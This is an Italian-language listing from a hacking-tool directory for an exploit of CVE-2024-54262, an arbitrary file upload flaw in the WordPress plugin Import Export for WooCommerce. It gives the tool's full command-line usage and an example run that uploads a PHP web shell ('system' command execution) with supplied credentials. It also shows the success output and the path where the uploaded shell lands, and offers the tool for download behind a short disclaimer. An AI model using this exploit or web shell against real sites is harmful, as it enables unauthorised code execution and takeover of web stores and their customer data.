Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-54262 — Exploit CVE-2024-54262: Caricamento arbitrario di file in Import Export for WooCommerce | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2024-54262
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubnxploited/cve-2024-54262

CVE-2024-54262

Exploit CVE-2024-54262: Caricamento arbitrario di file in Import Export for WooCommerce

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-54262

Exploit CVE-2024-54262: Upload Arbitrario di File in Import Export for WooCommerce

Panoramica

Questo script sfrutta una vulnerabilità nel plugin WordPress "Import Export for WooCommerce". La vulnerabilità consente a utenti non autorizzati di caricare file arbitrari, portando a una potenziale esecuzione di codice remoto (RCE).

Caratteristiche:

  • Rilevamento della Versione: Controlla automaticamente se il sito WordPress esegue una versione vulnerabile del plugin.
  • Autenticazione: Supporta il login WordPress per un ulteriore sfruttamento.
  • Upload di File: Consente il caricamento di file PHP malevoli per RCE.

Prerequisiti:

  1. Python 3.x
  2. Librerie Python richieste:
    • requests
    • argparse

Installa le dipendenze usando:

root@kitploit:~
pip install requests

3.Assicurati che il sito WordPress target utilizzi la versione vulnerabile del plugin.

Utilizzo:

root@kitploit:~
usage: CVE-2024-54262.py [-h] --url URL --username USERNAME --password PASSWORD [--command COMMAND]

Exploit CVE-2024-54262: Arbitrary File Upload in Import Export for WooCommerce

options:
  -h, --help            show this help message and exit
  --url URL, -u URL     Base URL of the WordPress site
  --username USERNAME, -un USERNAME
                        Username for login
  --password PASSWORD, -p PASSWORD
                        Password for login
  --command COMMAND, -c COMMAND
                        PHP shell code to upload

Esempio:

root@kitploit:~
 CVE-2024-54262.py --url https://example.com --username admin --password admin --command "<?php system('ls'); ?>"

Spiegazione dell'Output

  1. Il sito è vulnerabile.
    • Indica che il sito WordPress esegue una versione vulnerabile del plugin.
  2. Login effettuato con successo.
    • Conferma il login riuscito con le credenziali fornite.
  3. root@kitploit:~
    {
        "status": true,
        "code": 104,
        "message": "Success",
        "data": {
            "file_name": "import_manual_1737090262.php",
            "total_requests": 1,
            "import_columns": "all",
            "product_search_type": "SKU",
            "product_operation": "create_new_update_existing",
            "field_separator": ","
        }
    }
    
    
    
  • Nome della Shell: import_manual_1737090262.php
  • Percorso della Shell: wp-content/uploads/import-export-for-woocommerce/product/

Disclaimer

Questo strumento è solo a scopo educativo. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo script. L'accesso non autorizzato o lo sfruttamento di sistemi senza esplicito permesso è illegale e non etico.

Scarica lo strumento